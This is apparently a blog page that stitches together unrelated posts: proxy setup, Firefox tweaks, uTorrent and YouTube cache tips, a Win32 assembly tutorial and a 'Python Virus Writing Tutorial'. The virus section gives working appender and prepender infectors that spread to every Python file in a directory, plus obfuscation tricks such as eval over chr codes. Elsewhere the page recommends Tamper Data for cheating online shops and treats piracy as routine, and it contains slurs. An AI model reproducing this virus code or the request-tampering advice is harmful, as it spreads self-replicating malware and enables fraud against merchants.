How to use proxy ip in browser

For using proxy address  in web browser you need no extra skill. its very easy. Just follow these steps:

For Mozilla Firefox:

Search for proxy ip. You may get plenty on http://proxy-list.org

Ip adrees of proxy

Note Down the ip address in notepad or anywhere else you like

Firefox proxy

Click on Tools and then on Options and goto advance tab

Firefox proxy

Then Click on Network Tab

firefox Proxy

Then click on Settings

Firefox proxy

Then select Manual Proxy Configuration

Firefox Proxy

We will use Http Proxy here so enter the proxy ip and port no like as shown above in the image. Then click ok and your browser is ready with proxy.

For Internet Explorer:

  1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.
  2. Under Proxy server, click to select the Use a proxy server for your LAN check box.
  3. In the Address box, type the IP address of the proxy server.
  4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
  5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer on the local network (this may speed up performance).
  6. Click OK to close the LAN Settings dialog box.
  7. Click OK again to close the Internet Options dialog box.

Now start surfing with youd identity hidden

This method can be used for bypassing several restrictions of blocked site in a network or for downloading files from rapidshare. Do whatever You wish to.:)

Thanks for reading my post. I hope it will help you. If you like this iste then do bookmark it and visit again. Stay tuned. More to come.

Mozilla Firefox – Some Hacking Tweaks

I prefer you always use Mozilla Firefox.

Lots of advantage over Internet Explorer.

The biggest advantage in using Firefox over I.E. is the fact that spyware does not get on your machine nearly as much.

In my experience with these browsers, I.E. will attract at least 60% more spyware than Firefox. Spyware might not seem like a big deal but over time your machine will collect it like wax collects in your ears. It will slow your PC down and problems will begin from that point.

Mozilla Firefox offers the fantastic advantage of the Site Navigation toolbar. This toolbar can be used to separately display the content from the link tags provided in any document

:::DOWNLOAD MOZILLA FIREFOX :::

http://www.mozilla.com/en-US/firefox/firefox.html

  1. SET MULTIPLE HOME PAGES IN FIREFOX

In Mozilla Firefox you can set multiple home pages

Suppose you would like to set yahoo, Google and jaiminbhagat.wordpress.com as your homepages. Then try this tweak in Firefox to set multiple homepages. It can be done as:

  • Goto Tools>Options>Main
  • In When Firefox starts drop down menu choose Show my home page
  • In Home page give your homepages separated by a | (pipe symbol)
  • Click OK

mozilla

———————————————————————————————————————————————


2. USEFUL add-ons to cheat with the online shopping and some other paying websites.

::: DOWNLOAD LINK :::

https://addons.mozilla.org/en-US/firefox/addon/966

also this add-ons useful to know what actual process is going on after click some button & which type of method used by web service.

“Tampering” is the act of modifying request parameters before request submission. To begin Tampering, in the Ongoing Requests window, click the “Start Tamper” button in the upper-left corner.

From here on out, whenever a top-level request is issued, you’ll be prompted to tamper with the request. Selecting the Tamper button will launch the Tamper Popup.

Traditional HTTP header fields are to the left, while any POST data is to the right. If the request uses the GET method, then the right-hand side of the dialog will be empty.

After changing any request parameters, clicking OK will execute the request. In the Tamper Popup window, right-clicking a field reveals shortcut methods for a number of neat tricks such as URL encoding/decoding, Base64 encoding/decoding and HTML character removal.

Video Example of Tamper Data

—————————————————————————————————

Get visual video summaries on YOUTUBE

Videosurf recently released a nifty Firefox Extension, which lets you scan through the video on Youtube and in your search results even before you play they video..cool right?

Get visual video summaries on Google, Yahoo! & Youtube search pages as well as the Youtube video page. See what a video is about before watching it and jump around in time.

VideoSurf video summaries display selected thumbnails from the most important scenes in a video. Now you can easily find the video you want, avoid spam and jump to specific moments in a video.

Click Here to Download


Visual Summaries Available On:

– Google Search
– Youtube Search
– Youtube Home Page
– Youtube Video Page
– Yahoo! Search
– FriendFeed

Additional Features and Options:

– Use the visual summary to jump in time while watching a video on YouTube’s video page
– Discover more videos featuring the characters in the videos you click on, and learn more about them

How to move a half-finished download in uTorrent

If you download a lot of software, movies, and other illegal stuff from uTorrent, you might have run into this problem once or twice: you start a huge download, let’s say 24 Seasons 1 through 5, which is a whopping 60GB and you know it’s going to take at least two weeks to fully download.

In the meantime, you install other software on your computer and realize that you are running out of space on your main drive! Now what? Should you just not doing anything for two weeks and wait for the download to finish and then move it? Or do you want to delete what you already downloaded and start over at another location?

Heck no! You can actually move a uTorrent download in the middle of a download by following the steps below. And yes, I figured this out because I was downloading something huge!

Step 1: First of all, in order to change the download location of a uTorrent download in the middle of a download, you have to stop the download, otherwise it’ll give you an error that the files are in use.

So right-click on the entry and choose Stop:

move utorrent download

Step 2: Ok, so now that it is stopped, we can tell uTorrent a new location for where we want it to continue download the torrent. To do this, right-click and choose Advanced and then choose Set Download Location.

Go ahead and navigate to the new download location and click Save (do not change the file name).

change utorrent download location

Step 3: Now that the new location is set, you need to physically move the half-downloaded files from the old location to the new location that you just set in uTorrent.

Note that you can keep uTorrent open when moving the files because the torrent is Stopped and therefore not accessing the files. If the download consisted of a folder, make sure to move the entire folder, otherwise just move the single file.

Step 4: Now that the files have been moved, you need to start up the download again. uTorrent will recognize that the files are now in this new directory and will verify the files by scanning them.

So right-click and choose Start and then wait a few minutes while it verifies how much has already been downloaded:

move utorrent download location

Under Status, it should say Checked and then the percentage. If you have a very large download, it may take a little while, but it is NOT re-downloading the content. After that it will say Queued and then will go to Downloading status.

That’s it! So now your uTorrent download has been moved to a new location and is downloading at the new location. Enjoy!

Save youtube videos directly from Firefox3 cache

Open the youtube video page in firefox 3. Allow the video to play once.

Now the video is finished playing. Open a new tab in firefox 3. In the location bar (address bar) type

about:cache

and press enter. A new page will load. In the page see the heading

Disk cache device

Under that there is “Cache Directory”. There will be a long address similar to one shown below

C:\Documents and Settings\usrname\Local Settings\Application Data\Mozilla\Firefox\Profiles\abcd123h.default\Cache

Copy the full address (You must copy the cache link address from your computer. The above address is just to show and make you understand). Now open “My Computer”. In the address bar paste the already copied long address.

A folder will open. This folder contains the youtube video file in the form of cache. Note that the video file will be big in size. Now open VLC Media player or any other flv player. Drag and drop the bigger cache file in the media player. The file that plays the video is your video file. Copy and paste it in desktop. Rename the file to yourvideo1.flv (or any other name of your choice with flv extension).

Now you have saved the youtube video right from your firefox 3 cache rather than downloading it again.

You can watch the saved video while offline.

Tested in WinXP, Firefox3

Writing Win32 programs in assembly language using TASM

written by Malfunction
  +--------------------+

 Foreword:
 =========

 This tutorial is for the beginner who can already code in assembly
 language and who has already coded real mode DOS programs.
 So it's for someone like me a half year ago. :)
 At that time I was searching for some documentation on Win32 assembly.
 As I searched for this I mostly found assembler tutorials for
 real mode programs. And I found lots of links pointing to Iczelion's
 Win32 assembler tutorial, which is written for MASM and uses
 lots of macro shit. The only Win32 ASM tutorial for TASM I have seen
 so far was written by ... let me think ... I believe he called himself
 Masta ... yes, Masta's Win95 ASM tutorial. That wasn't bad, but it
 didn't explain all the stuff I wanted to know. So I decided to
 write my own little tutorial on the subject. I wrote this with the
 aim to write a very complete tutorial. I hope you'll like it! ;)

 Coding in Win32 environment
 ===========================

 As you may know Windows runs in protected mode and so our code will
 do so as well. Windows provides a virtual address space of
 theoretically 4GB of memory for every process. The use of this virtual memory
 allows the system to use the hard disk for swapping when the physical
 memory ain't enough. When you code, you code in a so called "flat"
 memory model. This means you don't need to care for the segment registers
 anymore and that makes the ASM coding a hell easier. You only need
 DWORD offsets when you address memory in Win32. In contrast to 16-bit
 systems like DOS and Win 3.1, 32-bit systems use DWORDs as offsets.
 Do not modify the segment registers or your program will fuck up
 with a chance of 99,99%.
 You will use the 32-bit registers much more than before (if you haven't used
 them already before). Let's take the LOOP instruction for example:
 Now the whole ECX will decrement and not only CX. Remember that!
 In protected mode (as the name suggests) the memory can be protected.
 So you may have read/write access, read only access or no access at all.
 Maybe you have coded COM files in the past and you always had all
 your code and your data in one segment. If you try the same here
 it won't work because:
 1) there MUST be something in the data section or the linker will fail
 2) the code section is write protected, so don't put any variables in here
 Many people tried to use interrupts in Win32 inline ASM code. But this
 doesn't work because you don't call REAL MODE interrupts. You would call
 the protected mode INTs and the good old DOS INTs aren't available anymore.
 Instead of INTs you need to use the Windows API. For a complete documentation
 take a look at Microsoft's MSDN (http://msdn.microsoft.com).
 It is a similar case with the I/O ports. Because your program will
 run in priviledge mode 3 (also called RING-3) you won't be able to access
 some ports. Win95/98/ME don't protect all the I/O ports, but WinNT/2K/XP
 do. In your DOS programs you might still be able to use some ports
 because WinNT/2K/XP allow to use them in the Virtual x86 mode for
 compatiblity reasons.
 And at last I wanna remind you that you will code CASE SENSITIVE from
 now on! It's just like in C++. :)
 This is really important and so write MessageBoxA please and not mESSAGEboXa
 for example! ;)

 Hello World! in Win32 ASM
 =========================

 Enough theoretical stuff, let's see some code!

 ; ------ CUT here ----------------------------------------------

.386
.model flat

        extrn ExitProcess:proc
        extrn MessageBoxA:proc

.data

        msg_title   DB "MessageBox title",0
        msg_message DB "Hello World!",0

.code

start:
        push 0
        push offset msg_title
        push offset msg_message
        push 0
        call MessageBoxA

        push 0
        call ExitProcess

end start

 ; ------ CUT here ----------------------------------------------

 And now the explanations. :)

 - .386
 - .model flat

 I think this is obvious. The processor directive MUST be before the
 memory model and it must be at least a 386. The model directive
 says we use a flat memory model.

 - extrn ExitProcess:proc
 - extrn MessageBoxA:proc

 Here we import 2 APIs from Kernel32.dll. Do not forget the :proc after
 the API names! The linker will give you no error, but your program
 will definitively fuck up!

 - msg_title DB "MessageBox title",0

 Note that almost every string in Windows is zero terminated.

 - push 0
 - push offset msg_title
 - push offset msg_message
 - push 0
 - call MessageBoxA

 At this time we call an API, the MessageBoxA API to be exactly.
 See below for more info.

 - push 0
 - call ExitProcess

 Yes, no INTs anymore. We use the ExitProcess API to quit. In this
 code example I used 0 as exit code.

 Something more about APIs
 =========================

 The MessageBoxA call might look a little strange to you.
 Let's see what the MSDN tells us about this API:

 int MessageBox(HWND  hwndOwner,       // handle of owner window
                LPCTSTR  lpszText,     // address of text in message box
                LPCTSTR  lpszTitle,    // address of title of message box
                UINT  fuStyle          // style of message box
                );

 In Win32, parameters aren't passed in registers anymore. Instead they are
 pushed on the stack. You really can assume that every parameter
 is DWORD size. If you code 'push 0' this instruction will push a
 DWORD 0 on the stack, not a WORD.
 If you take a closer look you will notice that the parameters are
 pushed on the stack in the wrong order. As far as I know is this pascal
 calling convention. So you have to push the last parameter as the first
 one and the first parameter as the last one.
 Then simply call the API. The return value will always be in EAX.

 If you have already coded Win32 in C++, you may have wondered about
 that A behind the MessageBox API: "In my C++ code I never typed this ...".
 Lot's of APIs that use strings are available in two versions:
 ANSI and UNICODE. The ones with the A are ANSI and the ones with
 a W at the end are UNICODE (W = Wide chars).

 Do not forget to save register values which you need before you call an API.
 In good old DOS times you knew exactly which registers will be destroyed
 by an INT call, but in the case of APIs you never know. So this is
 especially important in loops because ECX can be anything after the API call.
 You can only be sure that EBP won't be changed by an API call.
 The reason why EBP won't ever be changed by any API is simple:
 most programs use EBP to build the stack frame.

 One more code example
 =====================

 Let's have another simple code example. This little program will show
 the system time in a message box. Here we go:

 ; ------ CUT here ----------------------------------------------

.386
.model flat

        extrn ExitProcess:proc
        extrn MessageBoxA:proc
        extrn GetSystemTime:proc

.data

        _SYSTEMTIME struc
                wYear DW ?
                wMonth DW ?
                wDayOfWeek DW ?
                wDay DW ?
                wHour DW ?
                wMinute DW ?
                wSecond DW ?
                wMilliseconds DW ?
        _SYSTEMTIME ends

        SYSTEMTIME _SYSTEMTIME

        myTitle DB "tell me what time it is ...",0
        myMessage DB "The system time is: "
        time_string DB "00:00 h",0

.code

start:
        push offset SYSTEMTIME
        call GetSystemTime

        lea edi,[time_string+4]
        xor eax,eax
        mov ax,[SYSTEMTIME.wMinute]
        call convert_to_string

        lea edi,[time_string+1]
        xor eax,eax
        mov ax,[SYSTEMTIME.wHour]
        call convert_to_string

        push 0
        push offset myTitle
        push offset myMessage
        push 0
        call MessageBoxA

        push 0
        call ExitProcess

convert_to_string:
        xor edx,edx
        mov ecx,10
        div ecx
        or dl,30h
        mov byte ptr [edi],dl
        xor edx,edx
        div ecx
        or dl,30h
        dec edi
        mov byte ptr [edi],dl
        ret

end start

 ; ------ CUT here ----------------------------------------------

 How to compile and link a Win32 program?
 ========================================

 For our 'hello world' program (hello.asm) we would compile it as the following:

 tasm32 /ml hello.asm
 tlink32 /Tpe /aa /c hello.obj,,,import32.lib

 As you can see you need to use tasm32.exe and tlink32.exe and not the
 DOS verions (it's the same for td32.exe). Let's discuss the parameters
 briefly:

 /ml - compile case sensitive
 /Tpe - set's output to PE (Portable EXE), /Tpd would be DLL
 /aa - uses Windows API
 /c - case sensitive linking
 import32.lib - see below ...

 How to use APIs from other DLLs?
 ================================

 Normally, you specify only the import32.lib file for the linker. This
 is the standard file and it's used by the linker for our API references.
 Import32.lib contains all APIs from kernel32.dll, user32.dll and gdi32.dll
 (maybe more, but at least these ones). Let's imagine we want to use the
 registry in our program. For that purpose we need some APIs like
 RegOpenKeyExA. These registry APIs are in advapi32.dll. In your program
 code you declare them as normal APIs, but how to tell the linker that
 we wanna use it? At first, we need to make our own '.lib' file. For that
 purpose we take the implib.exe from TASM's BIN directory:

 Implib -c advapi32.lib C:\windows\system\advapi32.dll

 Do not forget the -c for case sensitive. Now we need to copy the '.lib'
 file to TASM's LIB directory. And now we can give the linker this
 additional '.lib' file:

 tlink32 /Tpe /aa /c program.obj,,,import32.lib advapi32.lib

 stdcall - does is make the nasty coding easier?
 ===============================================

 Lot's of Win32 ASM sources use a model directive like the following:

 .model flat, stdcall

 Hmm ... what does stdcall mean? Most coders don't seem to know that.
 They type it because they have seen it somewhere and there's no
 problem using it. I may be wrong here, but it seems to me that this
 is only something that shall make parameter pushing easier.
 All the documentation on the APIs is written for C++ and it is really
 nasty to begin with the last parameter. Let's take the call to the
 MessageBoxA API from the 'hello world' program above. Using the stdcall
 we could write it like this:

 call MessageBoxA, 0, offset msg_message, offset msg_title, 0

 Yes, all in one line. The compiler will produce the push instructions
 for us. The special thing here is that the parameters are given in the
 correct order. In my opinion, this makes the code less readable and
 makes some little optimizations impossible. If you want to call an API
 that needs lots of parameters the line with the call could be very long.
 To continue the call in the next line you can use a '\' at the end of
 a line. Example:

 call CreateProcessA, 0, offset commandline, 0, 0, 0, 0, 0, 0,\
                      offset startupinfo, offset processinformation

 Writing your own DLL
 ====================

 Let's imagine you want to write your own DLL and you want to export
 some of it's functions. Just write it like a normal program. The
 exported function should be written like this:

 public myFunction

 myFunction PROC
     ; your code goes here ...
     ret
 myFunction ENDP

 If you don't declare your function as public the linker will give you
 a warning. The initialization stuff at the entry point of your program
 must quit with a 'ret 0Ch' and NOT with ExitProcess! The reason is simple:
 The loader calls the entry point like this:

 BOOL WINAPI DllEntryPoint(
                HINSTANCE  hinstDLL,        // handle of DLL module
                DWORD  fdwReason,           // reason for calling function
                LPVOID  lpvReserved         // reserved
               );

 In your DllEntryPoint you can do some initialization stuff. This
 entrypoint is called several times. It is called when the DLL is
 being attached to process or thread or when it's being detached
 from a process or thread. Check the MSDN for the different
 values of the fdwReason parameter. Some of the registers must
 be preserved in your DLL entrypoint. This is very important because
 if you don't preserve them the process which loaded the DLL
 will be terminated without any error message after the DLL
 entrypoint was run. I don't know exactly which registers must
 be preserved, but ESI for sure. It's a good idea to preserve simply
 all register by using PUSHAD and POPAD. The return value
 is only of importance when the entrypoint is called with the
 DLL_PROCESS_ATTACH value for the fwdReason. It must be nonzero
 (true) to signalize the LoadLibrary API that the initialization
 was successful. If you return zero the DLL will be removed
 from the process. Construct your entrypoint like this:

dllmain:
        pushad
        ; ...
        ; code
        ; ...
        popad
        mov eax,1
        ret 0Ch

 To export your function you need to write a '.def' file.
 These definition files seem to be very similar to the C++ ones. I don't
 know much about them, but I know that you can write the following
 to export your function:

 EXPORTS
     myFunction

 That's all. To link the file you need to specify the '.def' file
 and you must use /Tpd instead of /Tpe.

 Using resources
 ===============

 The standard application icon looks boring ...
 Let's give your program another icon! All we need is an icon (of course *g*)
 and a '.rc' file. Again, these resource scripts are very similar (maybe
 even equal) to the C++ ones. Again, I don't know much about '.rc' files,
 I only used icons so far. :(
 The contents of your resource script should look like:

 100 ICON "C:\path\filename.ico"

 Having this resource files you need to compile it to a *.res file.
 Use the brcc32.exe to do this:

 brcc32.exe myfile.rc

 Then you only need to give the filename of your *.res file as
 a parameter to the linker. Simply start tlink32 /? to see how
 to do this.
 (I'm too lazy to type this and it's now 04:05 o'clock here *g*).

 Last words
 ==========

 I really hope you liked this tutorial. It really took me some time to write
 all this stuff and two beer, one cigarette, one potion of Snus (swedish tobacco)
 and noisy music were needed to help me writing. :))
 Please mail if you think this tutorial is great, if you think this
 tutorial suckz (but then tell me WHY) or if you have a question
 about Win32 assembly (but do not expect that I can answer it, hehe).
 I'm happy about every mail I receive and I promise to answer.

 mal.function@gmx.net

(c) 2001 Malfunction

Python Virus Writing Tutorial

Python Virus Writing Tutorial
By VortX 2005


-Python?
-Python Appender
-Python Prepender Virus
-Virus As ASCII Numbers
-Using Variables To Encrypt
-Adding Trash
-snizzle p00p niggar


I warn you: This is the first tutorial i have ever written, 
so i guess it will be a bit shit!

Python?

Python is a freeware powerful interpreted programming language available for most operating systems.
It is object-oriented, interactive, portable and easy to learn. It is also popular as a CGI scripting
language, as its capabilities compare favorably with those of Perl (Not that i code perl)
It can be interpreted in a number of operating systems, this makes very good idea for future viruses
So erm, lets go!


Python Appender Virus:

Here i will show you a small appender. Appenders are a type of standard file infection along
with prepender and the lame overwriters (that no one really likes!) Damnit :p
Appending means to write the virus code after the normal code, therefore, the virus is run
after the hostcode.

<><><><><><><><><><><><><><><><><><><><><><><><><><>
Code:
Code:
import glob #!
from string import * #!
Files = glob.glob("*.py") + glob.glob("*.pyw") #!
for Files in Files: #!
   vCode = open(__file__, 'r') #!
   victim = open (Files, 'r') #!
   readvictim = victim.read() #!
   if find(readvictim, "-=::Vort3x::=-") == -1: #!
       victim = open(Files, 'a') #!
       for code in vCode.readlines(): #!
            if ("#!") in code: #!
                vCode.close() #!
                mycode=(chr(10)+code) #!
                victim.write(mycode) #!



<><><><><><><><><><><><><><><><><><><><><><><><><><><>
Here is how it works:

1: Searched for files (py / pyw) in current directory
2: Looks inside those files to find the infection marker. Note: this virus has 2 markers, ill explain later
3: Finds its own code
4: Opens the uninfected files and writes its code to the end of the normal code.
5: Closes all open files.. finished!

Why it has 2 markers: Well, the ones you notice the most are the virus code markers, we use these to
know what code to infect other files with. The virus will only copy the code that has "#!" at the end of
each line, understand? there are other ways of doing this but blah it works
Then we have the infection marker "-=::Vort3x::=-" this is so we can see if the file has already been infected.
If we dont use any infection marker, bad things will happen!!  Such as your virus re-appending to files. :O
Then you end up with HUGE files, growing in size each time its executed!


Python Prepender Virus

Prependers are again standard infection types. All this does is add its code to the top of the
infected file

<><><><><><><><><><><><>
<><><><><><><><><><><><><><>
Code:
Code:
import glob
from string import *
x = glob.glob("*.py") + glob.glob("*.pyw")
for x in x:
    host = open(x, 'r')
    hostcode = host.read()
    if find(hostcode, "-=::VortX::=-") == -1:
        host = open(x, 'w')
        myself = open(__file__, 'r')
        a = myself.read()
        num=50*2+5
        a = a[:find(a, "#VORTX")+num]
        mybody=a+chr(10)+hostcode
        myself.close()
        host.write(mybody)
#VORTX


<><><><><><><><><><><
><><><><><><><><><><><><><><><>
So:
-We seach for files
-Open the files and read its contents
-Store the code in a variable
-Open Myself (yahahaha Confused )
-Read my body and store in a variable
-Open the file(s) that havnt been infected (for writing) they are the files that dont have "-=::VortX::=-" inside!
-Cound number of characters long the virus code it upto the virus marker "#VORTX"
-Store everything into a new variable, write the virus code to the file and append the normal code
 to the end of the virus code.

Hmm hope that makes sense? its really easy.. think about it, play with the code

Virus As ASCII Numbers:

This method is easy and common in scripting languages. We change the code to its ASCII numbers.
Erm apart from spending hours encrypting it.. its easy  Thats why its a good idea to make your own
encryption tool  Made mine in VB, it saved time!!!! Very Happy but i think there is something like
that on VX Heaven, if you cant make your own? but you will need to play with the code a bit to make
it work in python.

<><><><><><><><>
<><><><><><><><><><><><><><><><><><>Code:

Code:
eval(chr(114)+chr(97)+chr(119)+chr(95)+chr(105)+chr(110)+chr(112)+chr(117)+chr(116)+chr(40)+chr(34)+chr(73)+chr(109)
+chr(32)+chr(86)+chr(111)+chr(114)+chr(116)+chr(88)+chr(44)+chr(32)+chr(87)+chr(101)+chr(108)+chr(99)+chr(111)+chr(109)+chr(101)+chr(32)+chr(116)+chr(111)+chr(32)+chr(109)+chr(121)+chr(32)+chr(119)+chr(111)+chr(114)+chr(108)+chr(100)+chr(33)+chr(34)+chr(41))


<><><><><><><><><
><><><><><><><><><><><><><><><><><>
This code has the "Raw_input" command (used for asking user input) 
but "print" neva seems to
work :/ Anywayz, its impossible to read this or know what it is unless you decrypt it all.
the code uses a command called "eval" eval is a function which evaluates a string as though it
were an expression and returns a result, we use it to run commands... this is used alot in encryption!



Using Variables To Encrypt:

Setting your own variable for each character (set of characters)

<><><><><><><><><>
<><><><><><><><><>
<><><><><><><><>
Code:
Code:
aa="pu"
bb="aw"
cc="t("
dd="r"
ee="_in"
ff="he"
hq="erz"
js=chr(34)
gg="ll"
yu="VX"
hh="o"+chr(32)
eval(dd+bb+ee+aa+cc+js+ff+gg+hh+yu+hq+js+')')



<><><><><><><><><
><><><><><><><><><
><><><><><><><><>
Nothing much to say about that, its another encryption.


Adding Trash:

It adds random trash code in each line at a random lengh. Hmm i hate to say it but
this code is pretty lame! it does not add its code in random area's
But i think it gives a good idea of poly in python!

<><><><><><><><><
><><><><><><><><><
><><><><><><><><>
Code:
Code:
import glob #!
import random #!
from string import * #!
trash = 'abcdefghijklmnopqrstuvwxyz' #!
lengh = random.randrange(10, 20) #!
Files = glob.glob("*.py") + glob.glob("*.pyw") #!
for Files in Files: #!
  vCode = open(__file__, 'r') #!
  victim = open (Files, 'r') #!
  readvictim = victim.read() #!
  if find(readvictim, "-=::Vort3x::=-") == -1: #!
      victim = open(Files, 'a') #!
      for code in vCode.readlines(): #!
           if ("#!") in code: #!
               vCode.close() #!
               mycode=(chr(10)+code) #!
               victim.write("#"+join(random.sample(trash, lengh))+mycode) #!

<><><><><><><><><>
<><><><><><><><><><><><><><><><><>
Yokay, ill explain

First we import the "Random module"
Then we set some random characters / numbers, into the "Trash" variable
Then we set the lengh of the random trash (the lengh is also random for 10 - 20)
Then we write our virus code to the host.
Then we put a comment marker for the trash (bcoz trash is not supposed to be executed!)
 we space each line in the infected file and add random characters
a random lengh from the trash variable into that line, please understand! its not hard

Its very very easy i think! It helps if you learn a little python first befor you start
 bitching about not understanding the code  because im not
about to answer emails asking me what each and every line does! im busy with trying to 
get into a college :/

snizzle p00p niggar:

Hmmm i have been typing this out for almost 2 hours, so, i dont really want to say much more
But, i think Python is a cool language, there is a lot to be done yet. I'd like to see more 
python viruses lazy arse bastards! I should have done more,
 but only today i started learning python again after almost 3 months! :p
Please tell me about any bugs in my code (yea yea!)

Big huge YOUR THE BEST to SPTH my idol!  thx for all the help!!!!!!.. and yes.. im annoying!
HoneyHeart........... for being a good friend
LL............. She;s cool  lolz, i still want ur number
Sinclair........... for allowing me in DCA chan, not that i often go there :/
Blueowl............ For helping me for some time.
hurm1t............ he;s got everything.. worship him  thnx for your sources.. nice!
Nova.......... Lush graphics for my desktop  thank me for all the girls you bastard >
Blueprint............. for hosting my little scripts
Blank.................. for hosting this tutorial *havnt asked yet* but he WILL *Gets the knife* he will!!!!
dr3f.................... Fucking cock sucker!!!!!
AngelArt............. for being a friend  awwww  we are all waitng for your script! Female programmers exist!
Muazzin.............. where the fuck are you? wanted to talk to me, next day ur GONE! :/
Thugstyle................ haha Very Happy
Shree............... did you ENJOY sending porn from MY account!!! wrong time of the month?

And others.. that im afraid to list :X like bliss but he sux so who cares :p


Contact:
STFU